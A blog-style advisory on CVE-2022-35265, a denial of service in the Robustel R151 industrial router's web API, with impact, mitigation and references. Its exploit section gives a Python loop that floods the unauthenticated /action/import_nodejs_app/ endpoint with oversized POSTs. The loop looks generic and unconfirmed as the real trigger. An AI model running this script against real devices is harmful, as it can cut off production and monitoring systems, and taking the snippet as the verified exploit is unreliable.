CVE-2022-35265 - Denial of Service in Robustel R151 Web Server (`/action/import_nodejs_app/` API)

Summary:  
A denial of service vulnerability (CVE-2022-35265) exists in the Robustel R151 industrial router’s web server (versions 3.1.16 and 3.3.) within the hashFirst function. By sending specially crafted requests to the /action/import_nodejs_app/ API, a remote attacker can cause the device to become unresponsive.

What Is the Robustel R151?

The Robustel R151 is a popular industrial router used for secure, remote-edge communications:  
- Robustel R151 official page

About the Vulnerability

The core issue is found in the hashFirst functionality of the R151’s web server.

Vulnerable versions: 3.1.16 and 3.3.

- Vulnerable API endpoint: /action/import_nodejs_app/

No authentication needed (if device is exposed to the internet or local network)

When a maliciously-designed network request hits the /action/import_nodejs_app/ endpoint, the router’s web server hits a processing condition that causes it to hang, stop responding, or possibly reboot.

How Does the Exploit Work?

Attackers can send a sequence of requests with specific data fields designed to trigger stress or errors in the web server’s hashFirst processing. Typical symptoms on the device:

Web configuration page stops responding

- SSH/telnet/management frozen

Here is a basic Python snipplet to repeatedly POST malformed data to the API

import requests

target = 'http://<R151-IP>/action/import_nodejs_app/';
# No authentication used in many setups

payload = {
    "project": "test",
    "entry": "main.js",
    "nodejs": "badinput" * 10000  # Excess/bad input to trigger hash issue
}

while True:
    try:
        r = requests.post(target, data=payload, timeout=2)
        print('Status:', r.status_code)
    except Exception as e:
        print('Exception:', e)
        break

Replace <R151-IP> with the actual device IP.

- The long/invalid data for "nodejs" triggers the vulnerability.

After several requests, the server may stop responding.

NOTE: Do not use without authorization! This is provided for educational purposes only.

What Makes This Vulnerability Dangerous?

- Impact: Router becomes unusable or needs a reboot. This can affect production lines, sensors, or remote monitoring systems relying on the R151.

No login required: If the API is exposed, anyone can attack.

- Potential for automation: Attackers can write simple scripts or use tools like curl, making attacks easy to repeat.

Upgrade firmware: Check for fixed firmware from Robustel:

Robustel Support Center
- Monitor logs: Look for repeated POSTs to /action/import_nodejs_app/.

References and More Info

- Original advisory at AttackerKB
- NVD CVE-2022-35265
- Robustel Product Security
- Full Exploit Example (Packet Storm)
- ExploitDB PoC Code

Final Thoughts

CVE-2022-35265 shows how a simple sequence of requests to an overlooked management API can take down critical connectivity devices. If you manage or deploy Robustel R151s, check your firmware and restrict access immediately. Even if your system seems safe on a private network, security bugs like these mean attackers might find a way in—keep systems patched and monitored!

If you found this guide helpful, remember to check all industrial devices for similar issues and apply the latest updates.  
Stay secure!

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 03/08/2023 01:09:00 UTC